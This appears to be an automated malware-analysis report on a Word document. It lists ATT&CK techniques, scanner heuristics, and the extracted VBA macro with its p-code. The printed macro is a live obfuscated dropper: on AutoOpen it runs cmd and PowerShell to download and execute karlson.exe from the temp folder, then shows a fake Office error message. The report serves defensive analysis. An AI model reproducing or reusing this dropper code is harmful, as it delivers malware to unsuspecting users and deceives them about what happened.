MALICIOUS
190
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
T1105 Ingress Tool Transfer
The sample contains a VBA macro that utilizes CreateObject to execute a command. This command constructs a PowerShell command to download a file named 'karlson.exe' from the URL 'http://schemas.openxmlformats.org/drawingml/2006/main/' to the user's temporary directory and then executes it. The macro also displays a fake Microsoft Office error message to the user.
Heuristics 7
-
ClamAV: Doc.Dropper.Agent-5907339-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-5907339-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
ewrtgcx = "art-Pro" Set dsfasD = CreateObject("W" + fiod.iuonx + "l") kdjfjjf = "(New-Object " + fiod.tutee + "tem.N" + fiod.wred + "Cli" + fiod.tiyjh + ")" -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
lhjtr = ".DownloadFile('" + fiod.sdwsx + fiod.tyjcx + fiod.serds + "bk','%" + yuijhg + "P%\karlson.exe');St" + ewrtgcx + "cess '%" + yuijhg + "P%\karlson.exe';" jkaswhdqw = "cmd /c " + fiod.ertgf + fiod.vbnt + " " + kdjfjjf + lhjtr + "" dsfasD.Run jkaswhdqw, vbHide -
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Customizable = True Sub AutoOpen() nvbuwsiug -
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3309 bytes |
SHA-256: a41b36a254d1341c16769e16607252ce89b451333b3acedf354c68db6d6b9780 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
nvbuwsiug
End Sub
Attribute VB_Name = "jhdf"
Function nvbuwsiug()
uimhmv = "M"
zxcdsf = "T"
yuijhg = zxcdsf + uimhmv
ewrtgcx = "art-Pro"
Set dsfasD = CreateObject("W" + fiod.iuonx + "l")
kdjfjjf = "(New-Object " + fiod.tutee + "tem.N" + fiod.wred + "Cli" + fiod.tiyjh + ")"
lhjtr = ".DownloadFile('" + fiod.sdwsx + fiod.tyjcx + fiod.serds + "bk','%" + yuijhg + "P%\karlson.exe');St" + ewrtgcx + "cess '%" + yuijhg + "P%\karlson.exe';"
jkaswhdqw = "cmd /c " + fiod.ertgf + fiod.vbnt + " " + kdjfjjf + lhjtr + ""
dsfasD.Run jkaswhdqw, vbHide
MsgBox "Wo" + "rd has encountered a pr" + "oble" + "m", 16, "Microsoft Office"
End Function
Attribute VB_Name = "fiod"
Attribute VB_Base = "0{CAD30E07-1A57-4E0B-984B-104408B894C7}{33A39420-1A39-4A3E-9E12-16F8E65C86C9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' Processing file: /opt/analyzer/scan_staging/8e81e8680f6f4722a0078db4c85d9610.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 1300 bytes
' Line #0:
' FuncDefn (Sub zxcdsf())
' Line #1:
' ArgsCall yuijhg 0x0000
' Line #2:
' EndSub
' Macros/VBA/jhdf - 2046 bytes
' Line #0:
' FuncDefn (Function yuijhg())
' Line #1:
' LitStr 0x0001 "M"
' St dsfasD
' Line #2:
' LitStr 0x0001 "T"
' St CreateObject
' Line #3:
' Ld CreateObject
' Ld dsfasD
' Add
' St fiod
' Line #4:
' LitStr 0x0007 "art-Pro"
' St iuonx
' Line #5:
' SetStmt
' LitStr 0x0001 "W"
' Ld wred
' MemLd tiyjh
' Add
' LitStr 0x0001 "l"
' Add
' ArgsLd tutee 0x0001
' Set kdjfjjf
' Line #6:
' LitStr 0x000C "(New-Object "
' Ld wred
' MemLd jkaswhdqw
' Add
' LitStr 0x0005 "tem.N"
' Add
' Ld wred
' MemLd ertgf
' Add
' LitStr 0x0003 "Cli"
' Add
' Ld wred
' MemLd vbnt
' Add
' LitStr 0x0001 ")"
' Add
' St lhjtr
' Line #7:
' LitStr 0x000F ".DownloadFile('"
' Ld wred
' MemLd tyjcx
' Add
' Ld wred
' MemLd id_026E
' Add
' Ld wred
' MemLd id_0270
' Add
' LitStr 0x0006 "bk','%"
' Add
' Ld fiod
' Add
' LitStr 0x0013 "P%\karlson.exe');St"
' Add
' Ld iuonx
' Add
' LitStr 0x0007 "cess '%"
' Add
' Ld fiod
' Add
' LitStr 0x0010 "P%\karlson.exe';"
' Add
' St Run
' Line #8:
' LitStr 0x0007 "cmd /c "
' Ld wred
' MemLd Document
' Add
' Ld wred
' MemLd _B_var_uimhmv
' Add
' LitStr 0x0001 " "
' Add
' Ld lhjtr
' Add
' Ld Run
' Add
' LitStr 0x0000 ""
' Add
' St vbHide
' Line #9:
' Ld vbHide
' Ld _B_var_yuijhg
' Ld kdjfjjf
' ArgsMemCall _B_var_zxcdsf 0x0002
' Line #10:
' LitStr 0x0002 "Wo"
' LitStr 0x0017 "rd has encountered a pr"
' Add
' LitStr 0x0004 "oble"
' Add
' LitStr 0x0001 "m"
' Add
' LitDI2 0x0010
' LitStr 0x0010 "Microsoft Office"
' ArgsCall id_0272 0x0003
' Line #11:
' EndFunc
' Macros/VBA/fiod - 1409 bytes
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.